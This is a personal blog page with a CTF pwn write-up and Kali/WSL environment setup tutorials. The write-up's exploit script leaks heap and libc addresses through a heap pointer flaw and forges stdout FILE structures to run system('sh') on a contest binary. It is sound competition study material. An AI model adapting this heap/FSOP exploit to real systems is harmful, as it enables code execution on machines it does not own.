Lufiende Blog

[Writeup] 软件系统安全赛 2026 - 决赛 Pwn

Fri, 05 Jun 2026 00:00:00 GMT

||哈哈决赛拉了坨大的，滚去考研去了||

1. StudentManagement

:::tip 这道题是唯一一道要求 Fix 的，但是我不会，不会修 :::

1-1 分析

1-1-1 菜单功能一览

对于攻击来说，这是一个菜单堆

一个大菜单主要是申请堆块（Reg）和删除堆块（Del）
一个小菜单主要是输出内容（View）和部分修改（Bio）

1-1-2 堆块结构

我们来看申请堆块的函数 :::important buf 是 Qword 类型指针，以 8 个字节为单位算 ::: 首先会申请可用大小是 0x88 的堆块，然后会往堆块写内容，其中：

前 0x10 是 ID，占大小 0x10
0x10 - 0x50 是 Name，占大小 0x40
0x50 - 0x70 是 Password，占大小 0x20
0x80 - 0x88 写入了某个地址，占大小是指针的 8 字节，这里 0x4030 是存放堆块地址的地方，而且是最近申请的堆块地址，这里是把自己的地址放上去，把原本的地址写到堆块的这个位置，不难看出这里要存一个单链表，我标注的 fnFindID 其实就是遍历这个单链表
所有输入全末尾置 0 并且不会越界再看上面提到的修改别名的函数大小被限制到了 0x400，不存在就根据输入大小申一个，大小超了就释放了申请一个，堆块 0x70 的位置放了一个记录别名堆块的地址，堆块 0x78 写了一个堆块的大小（输出要用）至此堆块的结构就解析完了

1-2 问题点 & 利用思路

我们回顾上面的别名堆块，他会先判断对应位置堆块地址存不存在，堆块符不符合要求，而且第一次增加别名的话并不会直接写一个地址上去，申请堆块也不会对堆块进行清零操作这就会导致一个问题，我们如果有一个上面说过的堆块，这里正好可以留一个地址的话，我们就能在任意的某处写东西，进而构造成自己指自己的结构实现任意写但是存在一个问题正常 Free 会置 0，我们需要一个极其天才的设计，才能在对应位置写地址 ||其实当时很快就想到了，奈何开题开错了，脑子抽了没找到洞，人也不全，其他题被一个逆向部分卡住了，直接爆 0||

1-3 解题思路

其实就是堆风水，我们需要

一个非 tcache，能分出堆块且大小适合的大堆块
看图说话
1. 想尽一切办法，在这个非 tcache 的大堆上申一个绿色范围的堆块，然后释放，此时红色地方就会留下神秘小地址，这个工作基本交给 Bio 堆了
2. 然后再想想办法，将控制堆块申到橙色位置，我们就能往神秘小位置写很多东西，因为大小位置也是神秘小地址，大小肯定够、我认为红色位置是堆块地址是最有利的，可以构造任意写，所以我们对于大堆的要求是足够大，以至于我们分割这个大的 UnsortedBin 的时候可以留下 LargeBin 的头，而且大小范围内只有一个 LargeBin 的话指向的也是 0x33f0，符合任意写的要求，所以我们对应的绿色块其实小 0x10 考虑到输入截断太多，这个任意写肯定是要多次的，但是往非堆地方写一次就不能用了，所以我们考虑改多个控制堆，所以当时我构造了这样的我们其他地方找个堆块，往大堆申请一个大的 Bio 堆，释放，红色地方留下地址，申请一个 0x88 的橙色控制堆，不释放，申请一个 0x88 的绿色控制堆，不释放，此时绿色堆可以往 0x3480 开始随便写我们还能写到橙色堆块，覆盖它的指针，可以做到泄露地址，任意写功能等等，下面脚本会介绍部分操作

1-4 脚本

#
############################################################################
# Start your exploit here
############################################################################


def begin():

    for i in range(10):
        add(i)
        login(i)
        edit(0x400, b'114514')
        logout()

    add(10)
    add(11)
    add(12)



    for i in range(9):
        rm(i)

    for i in range(8):
        add(i)

    for i in range(7):
        login(i)
        edit(0x400, b'114514')
        logout()


    login(10)
    edit(0xe0, b'1919810')
    logout()

    login(11)
    edit(0x400, b'1919810')
    logout()


    for i in range(20, 27):
        add(i)
        login(i)
        edit(0xe0, b'1919810')
        logout()

    for i in range(20, 27):
        rm(i)

    for i in range(7):
        rm(i)

    rm(10)
    rm(11)

    for i in range(7):
        add(i)

    for i in range(20, 27):
        add(i)


    add(30)
    add(31)


    add_s(32)
    add_s(33)

    login_s(33)
    edit(33, b'\x00' * 32)
    logout()

    login_s(32)
    edit(32, b'4545454545')
    logout()

    login_null(33)
    choice(1)
    io.recvuntil(b'Bio: ')
    leak_addr = u64(io.recv(6).ljust(8, b'\x00'))
    log.info(hex(leak_addr))
    heap_base = leak_addr - 0x24b0
    log.info(hex(heap_base))

    libc_addr = heap_base + 0x2398
    payload = b'\x00' * 0x18 + p64(0x91) + b'\x00' * 0x70 + p64(libc_addr)
    edit(len(payload) + 1, payload)
    choice(1)

    io.recvuntil(b'Bio: ')
    leak_addr = u64(io.recv(6).ljust(8, b'\x00'))
    log.info(hex(leak_addr))
    libc_addr = leak_addr - (0x7b26f6403f50 - 0x7b26f6200000)
    log.info(hex(libc_addr))

    _IO_2_1_stdout_addr = libc.sym['_IO_2_1_stdout_'] + libc_addr
    _IO_wfile_jumps_addr = libc.sym['_IO_wfile_jumps'] + libc_addr
    system_addr = libc.sym['system'] + libc_addr

    file = FileStructure()
    file.flags = b'  sh;'
    file._wide_data = heap_base + 0x25c0
    file.vtable = _IO_wfile_jumps_addr + 24 - 0x38

    wide = WideDataStructure()

    # 过判断使用
    wide._IO_read_ptr = system_addr
    wide._IO_write_base = 0
    wide._IO_buf_base = 0

    # 上文说的想执行地址的地址
    wide._wide_vtable = heap_base + 0x25c0 - 0x68

    payload = b'\x00' * 0x80 + p64(0x91) + b'\x00' * \
        0x70 + p64(_IO_2_1_stdout_addr) + b'\xff' * 16
    payload += p64(0x31) + b'\x00' * 40 + p64(0x3b1)
    payload += bytes(file) + bytes(wide)

    edit(len(payload) + 1, payload)

    payload = bytes(file)

    pause()
    edit(len(payload), payload)

    io.interactive()


def choice(num):
    io.sendlineafter(b'>', str(num).encode())


def add(id):
    choice(1)
    id = str(id).encode()
    id = id.ljust(15, b'\x20')
    name = id.ljust(63, b'\x20')
    io.sendafter(b'ID:', id)
    io.sendafter(b'Name:', name)
    io.sendafter(b'Pass:', b'a' * 31)


def add_s(id):
    choice(1)
    id = str(id).encode()
    io.sendafter(b'ID:', id)
    io.sendafter(b'Name:', id)
    io.sendafter(b'Pass:', b'aaa')


def rm(id):
    choice(3)
    id = str(id).encode()
    id = id.ljust(15, b'\x20')
    io.sendafter(b'ID to delete:', id)


def login(id):
    choice(2)
    id = str(id).encode()
    id = id.ljust(15, b'\x20')
    io.sendafter(b'ID:', id)
    io.sendafter(b'Pass:', b'a' * 31)


def login_s(id):
    choice(2)
    io.sendafter(b'ID:', str(id).encode())
    io.sendafter(b'Pass:', b'aaa')


def login_null(id):
    choice(2)
    io.sendafter(b'ID:', str(id).encode())
    io.sendafter(b'Pass:', b'\x00')


def edit(size, con):
    choice(2)
    io.sendlineafter(b'size', str(size).encode())
    io.sendafter(b'tent', con)


def logout():
    choice(0)

2. Traditional

准备考研，慢慢更新......||比赛场根本逆向不懂，懂吗||

3. 带代理的神秘小游戏（忘了叫啥了）

缺逆向手，没做出来，也是等待更新......||卧槽9999竟然能直接连接我去不早说||

Kali-Linux Pwn 环境配置 - 使用 VMWare

Tue, 13 Jan 2026 00:00:00 GMT

:::note Tips：

本教程于 2026.1 更新 由于教程是在 WSL 子系统教程之后编写的，只作为针对新手的补充，后续可以参照子系统的教程，相对来说没有子系统的教程细致，但是更适合新手
- 使用 VMWare：VMWare Linux 基础配置
- 使用 WSL：WSL Linux 基础配置
- 工具安装：基础 Pwn 环境安装
本教程默认你有了基本的计算机操作水平并且已经解决了任何网络问题
由于网页和图床代理到 Cloudflare，如果你浏览有些卡顿甚至加载失败，请自行加速并刷新 :::

1. 安装 VMWare

1-1 哪里下载

多图流，由于 VMWare Workstation 已经被收购，下载相对麻烦了一些，我们可以访问官网：VMware by Broadcom - Cloud Computing for the Enterprise 使用邮箱注册后返回该页面登陆

1-2 如何安装

首先键盘按下 WIN + R 键勾选 等待安装完成，重启电脑，双击打开程序无脑下一步安装就可以了

2. 导入虚拟机

由于官方已经有打包好的现成的虚拟机，进入官网下载即可：Get Kali | Kali Linux 漫长等待下载完成后放在合适的位置并解压并打开启动虚拟机启动时不要操作，直到弹出登陆窗口，账号密码全是 kali，其中该虚拟机自带 VMWare Tools 可以达成下面的效果 <video controls width="1280" height="720">

（似乎你的浏览器不支持 video 标签呢）

</video>简单介绍一下桌面你可以启动终端进行下一步操作，剪切板与系统公用，但是复制粘贴需要 Ctrl+Shitf+c 和 Ctrl+Shitf+v

3. 虚拟机网络问题

没有网络的话可以

重启虚拟机
重启宿主机
切换网络模式
百度||，其实我上面的也是随便说的，但是重启能解决 99% 的问题|| 毕竟各种软件包的源都在国外，自行换源就可以，如果你厌倦了换源的话，在你的神秘小软件打开虚拟网卡模式即可

4. 优化虚拟机

该版本包含了大部分日常使用的软件和软件包，只要在终端操作，大致步骤都差不多，参考我配置子系统的文章

将 sudo 组免密（可选）
更新软件源
汉化虚拟机 :::warning 注意：虚拟机如果不安装 locales-all 软件包，生成语言需要一定时间||，但我忘了能否可以安装，可以试一下||，之后需要重启虚拟机 :::

5. 安装 Python 环境

参考：安装 Python 环境

6. 安装代码编辑器

你可以使用的编辑器有：

vim（广泛使用）在终端输入 vim <文件名> 可以编辑或创建文件
Mousepad 但是我赌你不喜欢他们，我们安装一个 VS Code 就可以了：Visual Studio Code - The open source AI code editor 输入

sudo dpkg -i ./code_1_108.1-..._amd64.deb

安装完后输入

code

就安装完成了根据这个步骤安装有关 C/C++ 和 Python 的插件，只安装有蓝色对勾的官方插件，第一次运行 Python 环境时会选择解释器在里面选你创建的环境就可以，没有就点击 输入解释器路径，并 查找，选择你创建的环境的 python 文件，你也可以使用第三个选择固化你的优先环境

Kali-Linux Pwn 环境配置 - 使用 WSL

Tue, 13 Jan 2026 00:00:00 GMT

:::note Tips：

本教程于 2026.1 更新 由于教程是在 WSL 子系统教程之后编写的，只作为针对新手的补充，后续可以参照子系统的教程，相对来说没有子系统的教程细致，但是更适合新手
- 使用 VMWare：VMWare Linux 基础配置
- 使用 WSL：WSL Linux 基础配置
- 工具安装：基础 Pwn 环境安装
本教程默认你有了基本的计算机操作水平并且已经解决了任何网络问题
由于网页和图床代理到 Cloudflare，如果你浏览有些卡顿甚至加载失败，请自行加速并刷新 :::![[environment_linux-pwn-vmware-0AD1F19C-7C07-4501-A03D-81011B6D35D6.png]]

1. 安装 WSL 2

:::tip 作为微软的亲儿子，无论你有没有安装或者更新过子系统，在你选择了 Windows 11 系统的时候，你就可以使用 wsl 命令，他会告诉你如何开启使用 ::: 在此之前，请确保你开启了Windows 功能中的适用于 Linux 的 Windows 子系统与虚拟机平台 微软提供了详细的安装 WSL 2 的方式：安装 WSL | Microsoft Learn 简单来讲就是在 cmd（Powershell）里一句命令的事情

wsl --update

2. 下载并安装任意发行版

:::tip 提示：所有方法安装后均可以在 Windows Terminal 找到对应的快捷选项卡，如果没有，就重启 Windows Terminal :::

2-1 使用微软商店

这里以安装 Kali-Linux 为示例，使用微软商店是最简单的方式，直接打开 Microsoft Store 搜索 Kali Linux 下载安装并打开

2-2 使用命令行

也是很简单的方式，我们只需要输入

wsl --list --online

然后输入

wsl.exe --install <发行版名称>

安装即可

2-3 解包官方发行版安装包并安装

使用微软商店安装镜像会默认安装到 C 盘，这里可以手动解压微软官方的 Appx 安装包并运行安装包的初始化 exe 程序，确保镜像生成在和 exe 程序相同目录，免去二次迁移位置的苦恼，这里还是以安装 Kali-Linux 为示例下载 Kali Linux 的 Appx 可以在下面的网页中下载：Microsoft Store - Generation Project (v1.2.3) [by @rgadguard & mkuba50] 你只需要去微软商店点击分享按钮并复制链接到网页就可以下载了，本体在 Appxbundle 中 下载好以后可以双击安装，当然，用压缩软件打开发现以下文件选择最下面的 x64 并再次用压缩软件打开（除非你真的用 ARM 架构的 Windows），并挑个好位置解压，文件夹里面应该有下面的文件，到此就算安装完毕了，只需要启动 kali.exe 就可以进行初始化

2-4 导入任意类型 tar 安装包

如果你是官网下载的 Ubuntu 或者是其他的官方发行版，亦或者是第三方发行版，**只要你找到对应的根文件系统的 .tar 包，你就可以导入到 WSL 里下载地址：Microsoft Store - Generation Project (v1.2.3) [by @rgadguard & mkuba50] 下载 Ubuntu 最新的 WSL 安装包接着就可以使用一下命令导入

wsl.exe --import <发行版名称> <安装位置> <文件位置> [Options]

Options:
    --version <Version>
    --vhd

举例，我要导入上文的包到一个目录，例如 F:\Virtual-Machine\Ubuntu ，那么我就会输入


wsl --import Ubuntu "F:\Virtual-Machine\Ubuntu" "C:\Users\Lufiende\Downloads\ubuntu-24.04.3-wsl-amd64.gz"

这个方式安装可能会导致 Windows Terminal 图标有问腿，需要手动定位

3. 简单配置虚拟机

touch ~/.hushlogin

3-1 WSL 基本设置

如果你开着一些代理软件，你可能会发现，他会告诉你诸如 Nat 模式无法使用代理等等的提醒，这是因为微软塞了一堆奇怪的小功能，你可以尝试去改动一些 WSL 的设置，如果你开着 Windows 的更新，你大抵是可以在开始菜单看到这个你可以参考我的设置，我放到了下面，如果你没有看到这个，你可以去用户目录下（C:\Users\xxx）新建一个 .wslconfig 文件写入配置，具体配置写法可以参照：WSL 中的高级设置配置 | Microsoft Learn，事实上能改的不止这一个，还有 wsl.conf，.wslgconfig 等文件可以自定义我的配置文件内容如下：

[wsl2]
processors=16
networkingMode=Mirrored

[experimental]
hostAddressLoopback=true
sparseVhd=true

关键的选择也是有的，这个 Mirrored 的网络模式也是有意思的，这个是继承自 Hyper-V 的功能，十分方便，能直接引用系统代理，如果你将来要进一步进行各种物联网仿真工作的话，其实 Nat 也是一种很好的选择同时你可以选择默认启用稀疏 VHD 使得删除文件时虚拟磁盘文件可以同步缩小

3-2 用户操作

3-2-1 创建用户

如果你使用上文前三种的方式创建了虚拟机，第一次打开它大概率会直接要求你建立一个账户并设置一个密码，按提示设置即可，以防万一还是提醒一下你看不到你输入的密码 如果你使用第四种方法，大概率登录直接是 root 账户，那么你可以新建一个，默认情况下都会建议你，用户名不能包含大写字母，也不能包含某些特殊字符，当然我也建议遵守这条限制||，虽然我没有遵守||

useradd -m <用户名> # 添加用户，-m 可以建立 /home 下的用户名目录
passwd <用户名> # 改密码
su <用户名> # 切换用户

3-2-2 添加用户到 Sudo 组

先看看你的账户能不能用 sudo，如果输入密码之后提示 xxx is not in the sudoers file，接着往下看进入 root 用户，如果你不知道密码，你可以使用

wsl -d <发行版> -u root

进入 root，然后使用 passwd 新建一个密码，可以方便以后直接进入，然后

usermod -aG sudo <用户名>

就可以了

3-2-3 将 Sudo 组免密（可选）

我们需要修改 /etc/sudoers 实现效果

sudo visudo
# 或者
su root
visudo

root ALL=(ALL:ALL) ALL

%sudo ALL=(ALL:ALL) NOPASSWD:ALL
%sudo ALL=(ALL:ALL) ALL

@includedir /etc/sudoers.d

图示如下

3-3 更新软件源

目前实测，大概率，你不需要进行任何换源操作就能更新，会自动使用镜像源，||虽然镜像源不是很稳定||，直接

sudo apt update
sudo apt full-upgrade  #（可选）

3-4 汉化虚拟机

我们可以趁机把汉化搞一下

sudo apt update
sudo apt install locales
sudo apt install locales-all # 有就安，不用等待生成了，kali 自带了
sudo dpkg-reconfigure locales

看介绍，这是要生成不同地区使用语言的区域设置，用滚轮或者上下键选择语言，这里以防万一可以全选，也可以拉下去只选 zh_CN.UTF-8 UTF-8 和 en_US.UTF-8 UTF-8，然后回车回车后，接下来是选择默认语言，选择 zh_CN.UTF-8 就可以，~~除非你是罕见~~，选完之后关掉现在的终端，重启或者 logout 也行，重新打开就能看见效果，~~比如看看 apt 的超级牛力~~

3-5 备份虚拟机

十分简单，备份只需要

wsl --export <发行版名称> X:\path\to\xxx.tar

导入类似于 2-4 提供的安装方法，可以

wsl --import <发行版名称> X:\path\to\ext4.vhdx (即<存放目录>)  X:\path\to\xxx.tar (即<备份目录>) --version 2

4. 针对性的高级配置

4-1 Kali-Linux 高级配置

4-1-1 安装配套开箱即用 MetaPackages

如果你安装了一个 Kali 发行版，他可能会提示你一些内容，例如

意思是 WSL 安装 Kali 都是以最小化模式安装的，并没有附带 Kali 的哪些强大的工具包，接下来就是去安装那些包的过程，安装的包叫 Metapackages，就是一次能安很多包的包，为了以后的方便，我们需要安装一些初始工具包，让 Kali 更加完整，我们会在下面指导这部分的安装内容，安装完后会自动消失 当然你也可以选择不安装，我这里选择不安装自带包，感觉我不是很用的上，忽略提示也可官方链接：Kali Linux Metapackages | Kali Linux Documentation，可以按官方教程来我们首先需要执行

sudo apt update
sudo apt full-upgrade -y
kali-tweaks

然后就会出现第二项就是我们要安装的 Metapackages 了，这里我放出来了官方的描述

kali-linux-core: Base Kali Linux System – core items that are always included kali-linux-headless: Default install that doesn’t require GUI kali-linux-default: “Default” desktop images include these tools kali-linux-arm: All tools suitable for ARM devices kali-linux-nethunter: Tools used as part of Kali NetHunter

一般选圈住的第一个的 kali-linux-default，用不到图形化界面可以选择 kali-linux-headless，如果喜欢一步到位可以选择 kali-linux-large，如果有特殊需求可以结合官网安装其他的包

4-1-2 Kali-tweaks 自定义选项

Shell & Prompt

Configure Prompt 用于调整终端的主题样式，可以自行摸索
Default Login Shell 用于调整默认终端，一般是 bash 和 zsh 中选择，这里建议大家可以在把默认终端改成 zsh，因为好用
Reset Shell Config 用于重置终端设置，就是 .bashrc 和 .zshrc 之类的

Network Repositories

Additional Kali repositories 别选，~~各位师傅你也不想因为一些包不稳定的更新而崩溃吧~~
Mirrors 是下载源的设置，你看到这里会发现我根本没有提过换源这个说法，其实是 kali 会自动用适合所在地的镜像而已，如果没有特殊原因无需变动
Protocol 是选协议，对于 apt 来说 https 其实安全不到哪去，维持原样即可

Hardening Settings

Kernel settings 涉及到关于 dmesg 命令的使用权限以及特权端口选项的开关，这个根据需要配置，~~你当个赛棍还管这么多，又用不到~~
Wide Compatibility mode 可以让你连接一些旧的，老的，不安全的客户端，按需开启

4-2 使用易用的 Shell

如果你使用的是 Kali-Linux，那么看上面的 Kali-tweaks 切换终端，以及简单美化如果你想美化终端，可以看下方的 个性化终端

一般来说，常用的 Shell 包括 sh ，bash， zsh 三种 Shell，其中我们常用前两者来解释我们写的 *.sh 脚本，后者作为我们日常使用的利器，大部分的发行版都包括了前两者，一些简洁的系统，例如 Alpine，则只有由 busybox 支持的 sh 一个 Shell 另外的，还有支持分屏的 tmux ，请大家自行探索，可以根据你的系统来安装

sudo apt install bash zsh


cat /etc/shells # 查看安装了多少 Shell
echo $SHELL # 查看当前使用的 Shell
echo $0 # 同上，查看当前使用的 Shell


chsh -s /bin/bash # 切换为Bash
chsh -s /bin/zsh # 切换为Zsh

4-3 个性化 Shell（可选）

4-3-1安装 oh-my-zsh


sudo apt install wget git curl

这里使用 oh-my-zsh 来进行个性化，官网：Oh My Zsh - a delightful & open source framework for Zsh 点击 install oh-my-zsh 之后，页面会自动滚到下载连接页

# 复制下载链接（注意时效性，二选一）
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
sh -c "$(wget https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh -O -)"

链接粘贴到终端下载就行，安装时会自动帮你把原本的 .zshrc 备份到同目录下的 .zshrc.pre-oh-my-zsh，效果如下图

4-3-2 安装前置字体

在此之前，你需要了解，因为这些主题通常会用到专业的字体，常见的可能就是 Nerd 和 Powerline ，某些主题很可能会推荐其中之一的字体，甚至是会直接提供基于这些字体修补过的专用字体，安装主题时需要多留意源网页的安装指导 :::note 下文的 Powerlevel10k 使用了修补过的 nerd 字体

MesloLGS NF Regular.ttf
MesloLGS NF Bold.ttf
MesloLGS NF Italic.ttf
MesloLGS NF Bold Italic.ttf ::: 如果没有给出特定的下载连接或者是字体样式，你可以尝试普通的 Nerd 或者是 Powerline Nerd 下载地址：Nerd Fonts - Iconic font aggregator, glyphs/icons collection, & fonts patcher Powerline 仓库：powerline/fonts: Patched fonts for Powerline users. 由于通常使用子系统会使用 Windows Terminal ，所以我们需要在 Windows Terminal 进行一些配置选择安装的字体就可以了，图片仅作示例

4-3-3 搜索并安装主题

完成这些工作，你可以在官网的 Themes 找到各种主题当然也可以自行在搜索引擎上寻找自己喜欢的主题，每个主题的安装方式可能有差别，所以请大家仔细阅读每个主题提供的安装文档！这里我以 Powerlevel10k 主题为例，链接：romkatv/powerlevel10k: A Zsh theme 可以参考源页面的安装方法，下载方式

git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k

也可以使用 gitee.com 上的官方镜像加速下载

git clone --depth=1 https://gitee.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k

编辑 ~/.zshrc 并找到 ZSH_THEME , 改为 "powerlevel10k/powerlevel10k" 这个主题第一次运行会有一个引导初始化设置的界面，如果不小心关掉或者想尝试一些别的设置可以使用 p10k configure 再次启动

4-3-4 启用一些喜欢的 oh-my-zsh 插件

zsh 内置了许多丰富的插件，查看可以在 $ZSH/plugins/ 下查看网络上也有许多优秀的插件，比如 zsh-syntax-highlighting：zsh-users/zsh-syntax-highlighting: Fish shell like syntax highlighting for Zsh. 它们都需要在 $ZSH/custom/plugins/ 目录下安装，或者是已经自带，包括 zsh-syntax-highlighting 在内的第三方插件都会在 github 官方文档中写明插件的安装方式，例如


git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting

更多有意思的插件可以在网络上寻找或查找相关大佬的文章当安装好插件后就可以启用了，还是在 .zshrc 中启用，我们找到 plugins=() 进行修改

plugins=(
    # 我的示例，这里面写你要添加的插件名字
    git
    zsh-syntax-highlighting # 外部
    z
    ssh
    zsh-completions # 外部
    command-not-found
    history
    history-substring-search
    you-should-use # 外部
    )

保存退出，重启 zsh 就可以看到改变了

4-4 联动 VSCode

前往官网下载 VS Code 首先，确保宿主机安装了 VSCode ，并且安装了 WSL 插件尝试在 VSCode 中连接一下当前的虚拟机，点左边下面的 >< 点 连接到 WSL 或者，尝试在虚拟机中使用

code .

一般来讲会安装一个叫 .vscode-server 的东西，这个安装完就可以正常使用，如果不能用，把下面这个放到 .bashrc 或者是 .zshrc


alias code="/mnt/<映射主机的 VSCode 安装目录>/bin/code"

之后直接在目录中使用


wsl -d kali-linux

code .

即可使用 vscode 编写脚本

5. Python 独立环境安装

5-1 为什么我需要一个独立 Python 环境

众所周知，Python 一般各个发行版都会提供，我们可以使用 apt 安装，甚至已经内置，为什么我们不直接使用，并在系统的 Python 直接安装各种包呢？其实，系统层面的 Python 大概率是为系统的其他部件提供支持的，许多 Python 项目通常需要依赖某些特定版本的库，可以说是专门为了系统各种软件和功能量身定制的，甚至可以说并不是给用户准备的，如果你后期安装了一些系统已经内置的包，但是版本有冲突，可能会出现一些问题对于某些经常更新的系统，例如 Kali-linux，它是一个 Rolling Release 即滚动更新的版本，apt 会不定期的更新安装所有安装的包，~~如果你和小伙伴约定组一辈子的 ctf 战队的话~~，如果遇到更新 Python 的情况，默认使用系统安装的 Python 的话，默认 Python 有朝一日可能会被更改成一个更新的版本，这时候你使用 Python 就会发现你的 Python 环境一朝回到解放前，只能使用诸如 python3.xx 的命令运行 Python 并且一些程序也会因为缺少依赖而无法运作，这是因为他会改掉 Python 对应的默认版本 理论上你可以通过修改 Python 的链接符号，或者是在新版本 Python 对应 pip 安装包时添加参数 --break-system-packages 来达成目的，但是我认为通过 pip 安装会在滚动更新的系统上引起一些其他不必要的 bug，创建一个虚拟环境来安装需要的包是个不错的选择这里有几种解决方法：

使用 pyenv 、conda 类型的环境管理
使用 uv 进行环境管理
使用 pipx
使用 apt 安装 python3-pwntools 等包这里只介绍前两种，通常你只需要一个独立的环境即可，不需要太麻烦的环境管理

5-2 安装 uv

uv 有详细的官方文档：安装 | uv 中文文档可以使用一键安装脚本，请确认 ~/.local/bin 处于环境变量中

curl -LsSf https://astral.sh/uv/install.sh | sh

如果你想自定义安装的话，可以定义下面几个环境变量，记得把下面存放可执行文件的目录放到环境变量中，也可以参考官方的 init 方法

# 写入 .bashrc

export UV_INSTALL_DIR="/mnt/wsldata/Environment/uv"
# 这是 uv 的安装目录，先定义环境变量再执行安装脚本

export UV_CACHE_DIR="$UV_INSTALL_DIR/cache"
# 这是 uv 的缓存目录

export UV_PYTHON_BIN_DIR="$UV_INSTALL_DIR/bin"
# 这是 python 可执行文件目录，需要添加到 PATH

export UV_PYTHON_INSTALL_DIR="$UV_INSTALL_DIR/installed"
# 这是 uv 的 pytohn 安装目录

export UV_TOOL_BIN_DIR="$UV_INSTALL_DIR/toolbin"
# 这是 uv 所有安装的包的可执行文件目录，需要添加到 PATH

export UV_TOOL_DIR="$UV_INSTALL_DIR/tools"
# 这是 uv 的包安装目录

安装过后可以尝试执行 uv，发现可以正常工作

5-3 安装 Pyenv

Pyenv 官方仓库：pyenv/pyenv: Simple Python version management 一键安装可以使用官方提供的脚本

curl -fsSL https://pyenv.run | bash

如果你想安装到自己的目录，你可以尝试

git clone https://github.com/pyenv/pyenv.git /path/to/directory

如果你使用 zsh，下一步需要执行下面的命令（作用是添加下面对应内容进入 .zshrc）

echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc
echo '[[ -d $PYENV_ROOT/bin ]] && export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc
echo 'eval "$(pyenv init - zsh)"' >> ~/.zshrc

自己安装请改动目录位置

echo 'export PYENV_ROOT="/path/to/directory/.pyenv"' >> ~/.zshrc
echo '[[ -d $PYENV_ROOT/bin ]] && export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc
echo 'eval "$(pyenv init - zsh)"' >> ~/.zshrc

# 追加插件
git clone https://github.com/pyenv/pyenv-virtualenv.git $(pyenv root)/plugins/pyenv-virtualenv
echo 'eval "$(pyenv virtualenv-init -)"' >> ~/.zshrc

可以参考我的然后就可以使用了

pyenv # 输入

pyenv 2.6.7-13-g2ecd676a
Usage: pyenv <command> [<args>]

Some useful pyenv commands are:
   commands    List all available pyenv commands
   exec        Run an executable with the selected Python version
   global      Set or show the global Python version(s)
   help        Display help for a command
   hooks       List hook scripts for a given pyenv command
   init        Configure the shell environment for pyenv
   install     Install a Python version using python-build
   latest      Print the latest installed or known version with the given prefix
   local       Set or show the local application-specific Python version(s)
   prefix      Display prefixes for Python versions
   rehash      Rehash pyenv shims (run this after installing executables)
   root        Display the root directory where versions and shims are kept
   shell       Set or show the shell-specific Python version
   shims       List existing pyenv shims
   uninstall   Uninstall Python versions
   --version   Display the version of pyenv
   version     Show the current Python version(s) and its origin
   version-file   Detect the file that sets the current pyenv version
   version-name   Show the current Python version
   version-origin   Explain how the current Python version is set
   versions    List all Python versions available to pyenv
   whence      List all Python versions that contain the given executable
   which       Display the full path to an executable

See `pyenv help <command>' for information on a specific command.
For full documentation, see: https://github.com/pyenv/pyenv#readme

但是还没有结束，你需要安装一些库来保证你可以编译出 Python，不同发行版可以参考：Suggested-build-environment · pyenv/pyenv Wiki 这里列出 Debian 系的包列表

sudo apt update;
sudo apt install make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev curl git libncursesw5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev

然后就可以准备安装工作

pyenv install -l # 列出版本列表
pyenv install <某个列出的版本号>

# 替换默认终端（可选）
pyenv global <某个列出的版本号>
zsh # 刷新终端，可能需要

5-4 安装 Anconda 或 Miniforge

Anconda 自带的库我们很可能用不到，反正用到还能自己装，所以我们选择小而美的 Miniconda，当然选择 Anconda 也可以 Anconda 官网：Download Anaconda Distribution | Anaconda 点击 Skip Registration 跳过登录即可下载（或者 Download Now | Anaconda），不过为了方便我们可以复制下载链接使用 wget（注意链接时效性）

wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
chmod 777 Miniconda3-latest-Linux-x86_64.sh

./Miniconda3-latest-Linux-x86_64.sh

我们还可以在阅读完用户协议后定义安装路径如果你以后可能会涉及到商业纠纷的问题，那你可以使用这个社区版，去 Releases 下载安装包安装：conda-forge/miniforge: A conda-forge distribution.

chmod 777 Miniforge3-25.3.0-3-Linux-x86_64.sh

./Miniforge3-25.3.0-3-Linux-x86_64.sh

同上文安装方法，安装之后，正常情况下你可以直接使用初始化命令

conda init
zsh # 刷新终端

默认情况下，初始化之后每次启动 Shell 会自动激活自带的 base 环境

5-5 创建更加独立的虚拟环境

:::tip 提示：部分 oh-my-zsh 主题可能会使 conda / pyenv 显示环境名的功能失效，每个主题修复的方式不一，大家可以自行百度 ::: 因为你会在不同的场合安装不同的包，所以你大概率需要创建一个虚拟环境，如果你立志成为一个 Pwn 大师，安装相关环境肯定是缺不了的，在这之后，我们就可以创建一个为 CTF 准备的 Python 环境了

5-4-1 uv

找一个合适的目录，使用命令

uv venv /path/to/env # 即存放环境的位置，根据自己的需求更改
# uv venv ./CTFpy 这是我的方法

source CTFpy/bin/activate

就可以激活虚拟环境不同的是，uv 并不支持你随时随地都能激活这个环境，你可以向你的 .zshrc 写入自定义函数来实现加载一个文件夹的虚拟环境，可以参考我的

uv-venv() {
    local VENV_BASE="/home/Lufiende/Environment/mounted/uv-globalvenv"
    # 更改自己的目录，我将所有可能会常用的通用环境放到了一个目录

    if [ -z "$1" ]; then
        echo "用法: uv-venv <环境名称>"
        echo "当前可用环境:"
        ls "$VENV_BASE"
        return 1
    fi

    local TARGET_ENV="$VENV_BASE/$1/bin/activate"
    if [ ! -f "$TARGET_ENV" ]; then
        echo "错误: 环境 '$1' 不存在于 $VENV_BASE"
        return 1
    fi

    if [ -n "$VIRTUAL_ENV" ]; then
        echo "正在退出当前环境: $(basename "$VIRTUAL_ENV")..."
        deactivate
    fi
    
    source "$TARGET_ENV"
    echo "已激活环境: $1"
}

这个时候，你只需要


uv-venv <环境名称>

